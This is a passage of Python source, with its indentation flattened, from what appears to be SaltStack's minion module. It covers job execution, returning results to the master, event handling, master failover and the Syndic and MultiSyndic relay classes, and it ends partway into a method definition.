# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
if hasattr(self, 'proxy'):
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh,
notify=notify,
proxy=self.proxy) # pylint: disable=no-member
else:
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Handling event tag \'{0}\''.format(tag))
if package.startswith('module_refresh'):
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif package.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(tag, data)
elif package.startswith('_minion_mine'):
self._mine_send(tag, data)
elif package.startswith('fire_master'):
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(tag, data)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.pub_channel
self._connect_master_future = self.connect_master()
self.block_until_connected() # TODO: remove # pylint: disable=no-member
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No SIGTERM installed, install ours
signal.signal(signal.SIGTERM, self.clean_die)
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons:
self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Properly exit if a SIGTERM is signalled
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No SIGTERM installed, install ours
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload') # pylint: disable=no-member
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid],
'_syndic_return',
timeout=self._return_retry_timer())
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
Make a MultiSyndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics.result() # pylint: disable=no-member
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master_id))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
log.error('Unable to call {0} on {1}, trying another...'.format(func, master_id))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag'])) # pylint: disable=no-member
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
